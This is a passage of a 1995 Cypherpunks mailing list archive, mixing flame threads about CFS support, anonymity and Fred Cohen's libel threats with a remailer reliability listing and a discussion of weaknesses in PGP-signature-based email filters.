office. Maybe he just > doesn't feel like spending that time, effort, and lab budget. Why > should he? CFS is a GIFT. It isn't a product. Maybe if you paid > someone to maintain a Linux version you would have one, but you aren't > paying a penny. Quit looking a gift horse in the mouth. > > .pm > I concur it is work!!!! and very time consuming. And it also takes time away from other projects, and if you are like most of us we don't have enough time for our current projects. Dan From perry at piermont.com Sun Dec 24 15:20:13 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 25 Dec 1995 07:20:13 +0800 Subject: CFS and Linux In-Reply-To: <1T7LgD3w165w@bwalk.dm.com> Message-ID: <199512241852.NAA12570@jekyll.piermont.com> Dr. Dimitri Vulis writes: > There's been a bit of confusion here. Perry Metzger stated that Matt Blaze > doesn't have Linux and shouldn't support it. I was incorrect that he didn't have Linux, but I stand by my position that Matt is under no obligation to support anything, or even maintain CFS at all. Its free software. Saying that someone is obligated to do anything for free is repugnant. If he wants to support Linux better, thats nice of him, but no one should bitch at him if he chooses not to work for nothing for them. One should thank Matt for being nice enough to do any of this AT ALL. Perry From fc at all.net Sun Dec 24 15:50:21 1995 From: fc at all.net (Fred Cohen) Date: Mon, 25 Dec 1995 07:50:21 +0800 Subject: corporate bashing In-Reply-To: <199512242101.PAA02640@proust.suba.com> Message-ID: <9512242220.AA04636@all.net> > We are not extremists. There is nothing extreme about believing that an > email you send to your spouse or your friend ought to be private, or that > people ought to be able to read and write about whatever subject interests > them. The extremists are those who are fighting so hard to preserve the > possibility of totalitarianism. In that sense, many cypherpunks are not extremists, but in another sense, many (most?) cypherpunks are. They seem to believe that in the Intenet, slander is acceptable behavior and that anonymity should be used as an escape from responsibility for what they do and say. If you want to remain free to speak your mind, you have to become responsible in at least two ways: 1 - You must top slandering people. 2 - You must stop using anonymity as a way to avoid being responsible. When I say must, I am not intending to mean anything less. If the cypherpunks continue to do these two things, they will rapidly find that they are doing more to destroy all of our rights to free speech in the Internet than they ever did to encourage freedom of expression. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From cp at proust.suba.com Sun Dec 24 16:16:13 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Mon, 25 Dec 1995 08:16:13 +0800 Subject: corporate bashing In-Reply-To: <9512242220.AA04636@all.net> Message-ID: <199512242356.RAA03010@proust.suba.com> > 1 - You must top slandering people. > 2 - You must stop using anonymity as a way to avoid being responsible. No. You must learn how to decide whether or not you want to believe something by looking it's plausibility and where it came form, and when you do learn that you need to realize that other people know how to do it as well. Don't blame anonymity for your own or others' inability to think critically. From fc at all.net Sun Dec 24 16:27:22 1995 From: fc at all.net (Fred Cohen) Date: Mon, 25 Dec 1995 08:27:22 +0800 Subject: bashing (fwd) Message-ID: <9512250004.AA08671@all.net> Forwarded message: >From fc Sun Dec 24 19:04:04 1995 Subject: bashing To: cp at proust.suba.com (Alex Strasheim) Date: Sun, 24 Dec 1995 19:04:04 -0500 (EST) In-Reply-To: <199512242356.RAA03010 at proust.suba.com> from "Alex Strasheim" at Dec 24, 95 05:56:44 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 1253 > > 1 - You must top slandering people. > > 2 - You must stop using anonymity as a way to avoid being responsible. > > No. > > You must learn how to decide whether or not you want to believe something > by looking it's plausibility and where it came form, and when you do learn > that you need to realize that other people know how to do it as well. I'm all for believing or not believing based on your understandings, but this is not the same as slander or irresponsible behavior hidden behind false identity. I'm also in favor of anonymity, but not for the purpose of slander. There are a lot of good and valid reasons for anonymity, and I believe that it is a basic requirement of freedom, but we will lose the ability to be anonymous if enough of us abuse the freedom. > Don't blame anonymity for your own or others' inability to think critically. I don't and didn't blam anonymity for this. I blame people who hide behind anonymity as a way to be irresponsible without apparent recourse. Evaluating statements and giving your opinion is not the same as making insluting, untrue, and crude remarks about individuals. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From wlkngowl at unix.asb.com Sun Dec 24 17:33:26 1995 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Mon, 25 Dec 1995 09:33:26 +0800 Subject: PGP timeline FAQ... comments requested Message-ID: <199512250123.UAA18523@UNiX.asb.com> On Fri, 22 Dec 95 13:37:35 GMT, you wrote: [..] Great job. A couple of suggestions... Version histories, with differences in each version. Also good to debunk the "PGP before version x isn't safe to use" myth. Might also want to throw in info about PGP hacks (mainly outside US), development of other software like SecureDrive, SFS, HPack (an archiver that uses PGP keys for digital signatures of files or encryption), development of anonymous remailers that use PGP, and even something about planned future developments (PGP 3.0, PGPPhone, etc...) >Long live the Pretty Good revolution, >Adam Back Merry solstice, --Mutant Rob From alanh at infi.net Sun Dec 24 17:59:31 1995 From: alanh at infi.net (Alan Horowitz) Date: Mon, 25 Dec 1995 09:59:31 +0800 Subject: bashing (fwd) In-Reply-To: <9512250004.AA08671@all.net> Message-ID: > Evaluating statements and giving your opinion is not the same as making > insluting, untrue, and crude remarks about individuals. So Fred, I gather that you believe that there is an absolute metric of insultingness, of untruthfulness, of crudeness. Possibly you think that you, Fred Cohen, are a good judge of these things, or that you know who to trust, to delegate these measurements to? Yes, Fred, please do act now to ensure that other Netters are held to the standards you propose. Perhaps you can propose a law that will enforce your will? From alano at teleport.com Sun Dec 24 19:30:47 1995 From: alano at teleport.com (Alan Olsen) Date: Mon, 25 Dec 1995 11:30:47 +0800 Subject: [Rant] Flame threads Message-ID: <2.2b7.32.19951225030300.008f8cbc@mail.teleport.com> -----BEGIN PGP SIGNED MESSAGE----- Well, this is getting real unpleasant... So far we have at least three distinct flame threads going on and all of them are being pretty fucking pointless. I am gpoing to address a few issues concerning this just to get them off my chest and then I am going to drop the issue. Alice and the Net Scrooge thread: I agree that Netscape owes a bit more to people who help them out, but some of your statements come from so far into left field that they are suffering from lack of oxygen. Where does AT&T come into the break of SSL and Netscape? AT&T may licence Netscape, but they do not own it. As a licence, I cannot see how they would bear any financial responsibility for fixes, breaks or other security breaches. The only reason I can see for the anger directed against them is because they are a big company. Still, your arguments do not follow. As for Netscape... They have been trying pretty damn hard to clean up their act. They are actually FIXING bugs that are being reported and not just forwarding them to Dave Null. This is an incredible improvement over past versions. I think the IPO has had a positive effect becuase now they have to act like a real company and have real quality control. This is a good thing! Hopefully they will keep up the good work on bug fixes. (We will see if they have yet fixed the HP4 print header bug in 2.0b4 though...) The Anti-Jeff/Matt/AT&T/Netscape thread: People are not a wholly owned subsidiary of their company. I judge people by their actions and not who they work for. Jeff Weinstien has worked pretty hard to get things done right within Netscape. That is not an easy feat. (I know this from experience.) He may sound defensive at times, but who would not after some of the shit he has to take from idiots who have no clue as to what it takes to get things done in a corporate environment. So far he seems to be doing a pretty damn good job for Netscape and the crypto community at large. As for Matt Blaze. He has done more for the crypto community as a whole that most anyone I can name. His accomplisments are pretty impresive. Anyone who can break Clipper and describe the break in just eight pages deseves a bit more credit than the anon-twits give him credit for. (Plus CFS and the various other crypto code he maintains and distributes.) So far the attacks on Jeff and Matt as being somehow corrupt seem more to weaken any efforts this list has and not to help them. Fred Cohen: You have no respect for the freedom or opinions of others. You expect the net to operate under your terms and under your rules. You want people to be "responsible". From what I have read here that seems to mean "punishable". I do not like some of flames I have seen, but I do not threated legal action against them. You have. I have meet the keeper of the list. He is a very nice guy and i would not want to see him go through hardship because of some whacko with a faschist control complex. Fred -- Go somewhere else. I suggest you get together with Dan Gannon and his ilk. I think you will find him more to your liking. (Or maybe the $cientologists. They are into sueing anyone who disagrees with them. I am sure they will help you start a list with your control fetishes in mind. Maybe you can borrow a few of their lawyers.) BTW, Fred has been killfiled on my mailreader. I am sick of listening to the twit. To understand what an honor this is... He is the only person I have killfiled on this or any mailinglist. Sorry to inject this much noise to the list. I am pretty damn hot over the amount of shit I have waded through in the last few days. The legal threats from Fred were the final straw. If toad.com ever needs financial support fighting legal battles from twits such as Fred, they will have my support! I know Perry will find all of this off topic. It probibly is... It just needed to be said due to my own peace of mind. Back to the regular scheduled flamethrowing... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMN4ToeQCP3v30CeZAQFQHQf/U7xnRgq+J50EbEE2qXyPTDjKxq3O1Px1 kY2TtVfSCa5202PL8n7PrMDq9OSvz+IlK1/jmGR8vwncbUerWbZCht23rzK5Kxfn FnCMPZg0/dCSg/2wsh4O71VU759Gs7lv7cPW2PX2Cjv2RhQ5dqixjui1Tai6DHvG MSUREvyZf113DJEpWp9GzIARaZVoUK74YgKHnQxjZjYtTI7AqMs+45bf9DyBwYkc HugoHdsJJ4YuAoozSfuejIkPqlxLY9FDc+4jZBpf6VUr7NpAhYEhrg4VdeENe293 Vd5rJZb0295rDeqIz16hOkoTlQ7vSIglttXufzFNjQVcqaV8YJPSQw== =QObR -----END PGP SIGNATURE----- | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From attila at primenet.com Sun Dec 24 22:56:28 1995 From: attila at primenet.com (attila) Date: Mon, 25 Dec 1995 14:56:28 +0800 Subject: Fred Cohen: Re: CFS and Linux In-Reply-To: Message-ID: Brian: There is no way Cohen can send the police to confiscate toad.com, or any other computer without some form of criminal complaint --other than by himself as citizen whistle-blower. I read the situation as Cohen was planning to attempt to make the actions a _criminal_ conspiracy. _If_ Cohen was successful in convincing either a state or Federal DA to seek a grand jury indictment, then the local police or the federal marshalls could be issued a search warrant to collect evidence. I can see Cohen trying to present his case before the Federal bench! In fact, I might be willing to pay admission. Cohen lives in Hudson OH which is also the location of jis private . Hudson is in Summit County and Akron (the county seat) has a branch court of the 4th Federal District (or used to). In West Virginia hill towns they teach the 3Rs: reading, 'riting, and the route to Akron, which is referred to as the capital of West Virignia. I can see the tremendous empathy of these people for Cohen's cause. As I mention above, getting a DA's attention on questionable slander, is a bit far-fetched! Tactically, I would think Cohen would find it necessary to actually win a civil suit which clearly indicated there was not only slander, but there was a malicious conspiracy to discredit Cohen. Until Cohen actually manages to score a civil victory, I believe he is dead in the water. Cohen should probably include me in his action --my idea of discrediting Dr. Fred was putting him in procmailrc. Dr. Frederick B. Cohen became Fred Cohen so part of this thread (missing anything from all.net) bled through. No more, so I will not even see any of the falderol if Fred*Cohen is anywhere in the text. On Sun, 24 Dec 1995, Brian Davis wrote: > On Sun, 24 Dec 1995, attila wrote: > > > On Sun, 24 Dec 1995, Brian Davis wrote: > > > > > On Sat, 23 Dec 1995, Perry E. Metzger wrote: > > > > > Fred Cohen writes to me in private: > > > ... > > > > > > > > Let's see. I guess I would start by having the police confiscate the > > > > toad.com computers becfause thay are part of a criminal conspiracy to > > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > I didn't realize that AI research was that far along. Can someone point > > > me to the specs for the computer that can become a "part of a criminal > > > conspiracy"?? > > > > > > EBD > > > > > > > > > > daamage my reputation. Criminal because of the recent changes in the > > > > law that prohibit you from sending me information I don't want to get. > > > > > > > > > the basis of the seizure is for evidence collection. then they > > take their sweet time scrounging the disks for evidence. If no > > evidence is found, they give it back --eventually. I saw one case go > > by a couple years back where they were trying to make the computer an > > accessory to the crime (I dunno, maybe it was supposed to auto-dial > > and drop the dime --no that's in 18USC as failure to snitch!) > > Much truth here, but not relevant to Dr. Fred's threat of a civil suit. > He can't have his attorneys just call the FBI to pick up toad's computer. > > CoS's seizure of computers, while shameful, was based on a different > legal theory than the good Dr. can possibly allege. > > > EBD > > > > of course, if there are drugs involved, they confiscate it as > > spoils of the criminal act and the equipment is impounded and > > eventually sold after conviction for the benefit of their slush funds. > > > > I would imagin you have seen plenty of the latter one in the > > Federal attorney's office. this also gets into the issues of private > > cryptography and that _everybody_ should give up privacy protection, > > first amendment rights, etc. so uncle can catch a few dopers, gun > > runners, and other assorted malcreants [sic] --like the difference > > between {mis,mal}feasance: in both cases you get fucked, but 'mal' is > > intentional... > > > > > > > Not a lawyer on the Net, although I play one in real life. > > > > > hey, at least you admit you're having a good time! > > > > > ********************************************************** > > > Flame away! I get treated worse in person every day!! > > > > > > > > > -- > > -------------------------------------------------------------------- > > #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL > > $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa > > 2/d0 > pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2) > > > > -----BEGIN PGP PUBLIC KEY BLOCK----- > > Version: 2.6.2 > > > > mQCNAy5vBesAAAEEAN8cl6vHXrKZ9lFfZDgfyJRr3HidW77Uio7F25QF6QXca5z/ > > AS3ZrWsa0CjF2nwrqmyb1E5no7dFB+70ZfK8233r7ykVkWRojT+0K71lnUZO4cjG > > +d19/ehXkDpkH3iHU7Uyo4ZdXLiI6uoFDS7ilzx8PCKcgvfq7b04kQrCC2kFAAUX > > tAZhdHRpbGGJAJUDBRAur/X7xUpiaI661j0BAbVUA/9RSKN5sOFVB4rjV6+a2aWD > > LjD5g/+eZaB/hI98qlPP+SBwzO3+K7+JWt3Fez0gKVju228ACGkvilg2VkMtQ0zm > > YCexYL0U9StzHt4xEpowpmaWx22jpEvWnI10LZvT/NO3uYg5r/ezVYc7autKvfvI > > rVOo322RkA0HNVV1rqjMGw== > > =UNt4 > > -----END PGP PUBLIC KEY BLOCK----- > > > > > > Not a lawyer on the Net, although I play one in real life. > ********************************************************** > Flame away! I get treated worse in person every day!! > -- -------------------------------------------------------------------- #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 Message-ID: <9512251230.AA25381@all.net> Sorry to post this to the list. I would normally only post it in private to the sender, but since the sender has decided to speak without listening I guess the only way to get the message back to them is by indirect communication. Will someone on the list please forward this reply to the original sender on my behalf? ... > Fred Cohen: > > You have no respect for the freedom or opinions of others. You expect the > net to operate under your terms and under your rules. You want people to be > "responsible". I know it's a lot to ask - being responsible - but I think it's the only way cypherpunks will survive in the coming environment. > From what I have read here that seems to mean "punishable". With rights come responsibilities. If you want the right of free speech, you have to use it responsibly - otherwise, you will lose the right - and quite possible lose it for me as well. > I do not like some of flames I have seen, but I do not threated legal action > against them. You have. I have meet the keeper of the list. He is a very > nice guy and i would not want to see him go through hardship because of some > whacko with a faschist control complex. Since you don't know me, you have no idea of whether these statements are true. Put yourself in my place. I posted no messages to the net and yet I was publicly accused without any cause of doing things I did not do by someone who knew that I didn't do them. When I complained to that person *in private* he published my personal mail to the list. As a result, you and others on the list are publicly calling me names like a whacko with a faschist control complex. It's not a matter of flames - it's a matter of intentionally and maliciously perpetrating a falsehood about me in a manner and fashion designed to damage my reputation. That's different than voicing your honest opinion and different than frivolous speech. It's within your freedom of speech to say a lot of senseless things - but it's not within your freedom of speech to intentionally perpetrate damaging falsehoods about other people. Your name calling is so outrageous that nobody is likely to take you seriously, and for that reason probably is not libelous - at least not at the level you do it today, but what Perry did was something quite different. His statement could well be taken seriously - he has not denied knowing that it was a falsehood - and it was clearly intended to damage my reputation. > Fred -- Go somewhere else. I suggest you get together with Dan Gannon and > his ilk. I think you will find him more to your liking. (Or maybe the > $cientologists. They are into sueing anyone who disagrees with them. I am > sure they will help you start a list with your control fetishes in mind. > Maybe you can borrow a few of their lawyers.) I have a better idea. I have as much right to be here or anywhere else as anyone in the world. Anyone who says I don't could easily be accused of being a "whacko with a faschist control complex", but I won't make such accusations in public against you. It is you who can't stand the heat of openly discussing one of the central issues of cypherpunks - responsibility and freedom relating to speech. The reason you can't stand serious conversation is because your position is unsupportable. > BTW, Fred has been killfiled on my mailreader. I am sick of listening to the > twit. To understand what an honor this is... He is the only person I have > killfiled on this or any mailinglist. People who close their minds to communication and choose to make one-way proclamations doom themseleves to ignorance. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From dlv at bwalk.dm.com Mon Dec 25 05:26:56 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Mon, 25 Dec 1995 21:26:56 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: <901NgD5w165w@bwalk.dm.com> owner-cypherpunks at toad.com writes: > Eric Murray wrote: > > | Where we're headed is mail filters with PGP imbedded (PGP 3 will > | make this much easier) that check incoming mail for a valid signature > | for certain PGP keyid/fingerprints and pass that mail along. > | Other mail that doesn't match gets tossed into a 'junk' folder > | or thrown away if you really don't want to talk to anyone that you > | don't already know. > > I agree with the assesment of where we may be going, but the > technology is available now. (Marshall Rose uses it; if you want to > get mail into his private mailbox, offer him some $ via imbedded FV > authorizations in the mail, and it goes into his inbox. If he thinks > it was worth his time, he doesn't charge you.) > > Anyway, the code is defeintely available now. The back end is a > little kludgy, but it was needed for an auto ley retreival script. > This could easily be hacked to include a +pubring=$people line. The > script gives you a keyid, which you can then use to filter on, ie: This is much better than nothing. This would stop the e-mail being sent to everyone who's ever posted to Usenet. I see a couple of attacks: 1. Alice only accepts signed e-mail from Bob. Carol receives a signed e-mail from Bob to Carol, sends 10,000 e-mails to Alice (via sendmail) with From: bob, same body+signature, possibly varying message-ids and subjects. 2. Alice only accepts signed e-mail from Bob. Carol, a rogue sysadmin, intercepts an e-mail from Bob to Alice, sends 10,000 more copies of it to Alice (via sendmail) with From: bob, possibly varying message-ids and subjects. As I keep pointing out, pgp-signing the body is not enough. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Mon Dec 25 06:49:15 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Dec 1995 22:49:15 +0800 Subject: ROS_pig Message-ID: <199512251432.JAA11244@pipe4.nyc.pipeline.com> 12-25-95. NYPaper: "Fear Of Freedom: The urge to censor persists." Anthony Lewis column. The very essence of the on-line world is freedom. The effect of the "indecent" prohibition of the telecom bill will be to reduce all users of cyberspace to the level of children. That is exactly what Justice Felix Frankfurter found unconstitutional writing for the Supreme Court in 1957, about a Michigan law that banned sales to anyone of material unsuitable for children. "Surely," he wrote, "this is to burn the house to roast the pig." "Coming Soon to Computers Everywhere, a World's Fair." John Markoff. In an era when the Internet has become synonymous with commercialism and instant fortunes, Carl Malamud's commitment to public service has set him apart. Mr. Malamud maintains that there are still two ways to build the Internet. One is the high-stakes high-visibility route of initial public offerings in the stock market, the money-raising approach being pursued by people like Netscape Communication's founders, Jim Clark and Mark Andreeson. The other route, Mr. Malamud maintains, is by soliciting funds and building viable public works projects that benefit the common good. 2 in 1: ROS_pig (13k) From raph at CS.Berkeley.EDU Mon Dec 25 07:11:22 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 25 Dec 1995 23:11:22 +0800 Subject: List of reliable remailers Message-ID: <199512251450.GAA06781@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"ford"} = " cpunk pgp hash ksub ek"; $remailer{"hroller"} = " cpunk pgp hash latent ek"; $remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut ek"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"wmono"} = " cpunk mix pgp. hash latent cut"; $remailer{"shinobi"} = " cpunk mix hash latent cut ek reord"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ek ksub"; $remailer{"gondolin"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"tjava"} = " cpunk mix pgp hash latent cut"; $remailer{'alpha'} = ' alpha pgp'; $remailer{'gondonym'} = ' alpha pgp'; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (c2 robo hroller alpha) (gondolin gondonym) (flame hacktic replay) (alumni portal) (vishnu spook wmono) Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. Note: all of the "ek" tags have been verified correct. Apologies to those who were inconvenienced by incorrect "ek" tags in the past. Last update: Mon 25 Dec 95 6:45:54 PST remailer email address history latency uptime ----------------------------------------------------------------------- hacktic remailer at utopia.hacktic.nl ***+*+****** 7:48 99.98% c2 remail at c2.org -+++++++.-++ 1:29:45 99.96% replay remailer at replay.com ******+***** 9:47 99.95% portal hfinney at shell.portal.com .#**+####### 11:36 99.94% bsu-cs nowhere at bsu-cs.bsu.edu #*#-####*#+# 12:47 99.91% rmadillo remailer at armadillo.com ++ +++++++++ 39:31 99.89% shinobi remailer at shinobi.alias.net ++--_.--++++ 4:25:47 99.88% alumni hal at alumni.caltech.edu -+*++##+###* 15:14 99.86% ford remailer at bi-node.zerberus.de .-+++++-+-++ 4:08:57 99.85% flame remailer at flame.alias.net ***+**++.-- 5:58:46 99.75% hroller hroller at c2.org -##+####.-## 47:58 99.75% spook remailer at valhalla.phoenix.net * *+* **.--+ 3:44:23 99.69% vishnu mixmaster at vishnu.alias.net #*++*** --- 1:19:08 99.68% tjava remailer at tjava.com # :23 99.48% mix mixmaster at remail.obscura.com +-+++____.- 20:55:03 99.27% extropia remail at extropia.wimsey.com -.-.-----. 14:54:08 99.16% wmono wmono at valhalla.phoenix.net * *+* * ** 13:17 98.94% amnesia amnesia at chardos.connix.com ----- --++- 3:09:50 98.65% penet anon at anon.penet.fi _....-.--- * 13:40:31 98.35% gondolin mix at remail.gondolin.org --____.-*+ 18:46:33 96.41% rahul homer at rahul.net *#++***-+##* 21:00 99.97% ecafe cpunk at remail.ecafe.org -####**-# 27:03 65.05% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From grafolog at netcom.com Mon Dec 25 07:20:54 1995 From: grafolog at netcom.com (Jonathan Blake) Date: Mon, 25 Dec 1995 23:20:54 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: <901NgD5w165w@bwalk.dm.com> Message-ID: On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote: > As I keep pointing out, pgp-signing the body is not enough. You're wrong. You can setup Procmail to detect if something is signed with PGP, and if it is, to run a script which determines the authenticity of the signature. If the signature is not authentic, the message goes to /dev/null. That way, even if Carol is using intercepted messages from Bob, Carol's messages won't be accepted or seen. xan jonathon grafolog at netcom.com **************************************************************** Opinions represented are not necessarilly mine. OTOH, they are not representations of any organization I am affiliated with, either. WebPage: ftp://ftp.netcom.com/gr/graphology/home.html For a good prime, call 391581 * 2^216193 - 1 ********************************************************************** From jhupp at novellnet.gensys.com Mon Dec 25 07:51:41 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Mon, 25 Dec 1995 23:51:41 +0800 Subject: Only accepting e-mail from known parties Message-ID: <13060E503DA@Novellnet.Gensys.com> On 25 Dec 95 at 7:45, Dr. Dimitri Vulis wrote: [much on a pgp based gateway filter for email] : : This is much better than nothing. This would stop the e-mail being : sent to everyone who's ever posted to Usenet. I see a couple of attacks: : : 1. Alice only accepts signed e-mail from Bob. Carol receives a signed e-mail : from Bob to Carol, sends 10,000 e-mails to Alice (via sendmail) with From: bob, : same body+signature, possibly varying message-ids and subjects. : : 2. Alice only accepts signed e-mail from Bob. Carol, a rogue sysadmin, : intercepts an e-mail from Bob to Alice, sends 10,000 more copies of it to Alice : (via sendmail) with From: bob, possibly varying message-ids and subjects. : : As I keep pointing out, pgp-signing the body is not enough. : Keep checksums of signitures (or body text) for a week, duplicate messages are routed to /dev/null. -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com You are lost in a maze of twisty little standards, all different. From lull at acm.org Mon Dec 25 08:23:04 1995 From: lull at acm.org (John Lull) Date: Tue, 26 Dec 1995 00:23:04 +0800 Subject: FH radios In-Reply-To: Message-ID: <30de2109.16381795@smtp.ix.netcom.com> On Sat, 23 Dec 1995 08:20:28 -0800, Steven Weller wrote: > Thus in a frequency-hopping radio you can push the retuning (read RF > phase-locked loop) technology to its limit and build transmitters and > receivers around them. These typically hop in the order of 100 times a > second. The adversary has to find the uncorrelated signal very quickly > indeed *and* have PLL technology at least as good as yours to recover > anything from it. Finding the signal generally means listening to all > frequencies at once, requiring huge amounts of hardware parallelism and/or > realtime computing power. Once you throw ten or so radios onto the same > band, it's no longer any use looking for the strongest signal, making that > approach useless. This is nowhere near the limit of the technology. 15 years ago, I was working on PLLs that would stabilize within a couple degrees of final phase within 3.5 microseconds. That permits you to do useful work at 100,000 hops per second. From ericm at lne.com Mon Dec 25 09:35:48 1995 From: ericm at lne.com (Eric Murray) Date: Tue, 26 Dec 1995 01:35:48 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: <199512251710.JAA08899@slack.lne.com> > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote: > > > As I keep pointing out, pgp-signing the body is not enough. > > You're wrong. He's right. > You can setup Procmail to detect if something is signed > with PGP, and if it is, to run a script which determines > the authenticity of the signature. If the signature is > not authentic, the message goes to /dev/null. That way, > even if Carol is using intercepted messages from Bob, Carol's > messages won't be accepted or seen. Ok. If I want to get my email ad for the Ronco turnip-twaddler past a filter like that, all I need to do is to create a PGP key with a user name that's the same as one that the victim already receives. i.e. if I know that joe at blort.com exchanges email with phred at none.net, then I just create a PGP key with the name "phred at none.net", and sign the turnip-twaddler ad with that. It'd have a valid signature, and one coming from Joe's friend phred. Mail accepted. In addition to checking for a valid signature, the filtering software would have to also check the PGP key id of the key used. It would also need to make sure that there is ONLY PGP-signed content in the mail. Otherwise Mallet could grab an innocuous mail message that Phred signed and included it at the bottom of the turnip-twaddler ad. It wouldn't make sense (although that might be usual with Phred), but it'd contain a valid signature from Phred, and therefore get the ad past the filter. I'm sure there's other caveats, these are just the ones I can think of now. I wish all Cypherpunks a Merry Christmas. I hope Santa brought you all something nice, like a fast new stream cipher, a new key exchange protocol, or maybe a note from the Fedz saying that ITAR has been lifted. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From dlv at bwalk.dm.com Mon Dec 25 09:43:47 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Tue, 26 Dec 1995 01:43:47 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: Jonathan Blake writes: > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote: > > > As I keep pointing out, pgp-signing the body is not enough. > > You're wrong. I'll be delighted if someone convinces me that I'm wrong about this. I may even start using PGP signatures. :) > You can setup Procmail to detect if something is signed > with PGP, and if it is, to run a script which determines > the authenticity of the signature. If the signature is > not authentic, the message goes to /dev/null. That way, > even if Carol is using intercepted messages from Bob, Carol's > messages won't be accepted or seen. Carol needn't put her real name in the "From:" line. Much of the unsolicited commercial junk e-mail comes from bogus addresses. I said, Carol can *forge* the RFC 822 header, so her e-mails look like they came from Bob, and use the body from Bob's authentic PGP-signed message. For example, Bob may have once sent Carol an 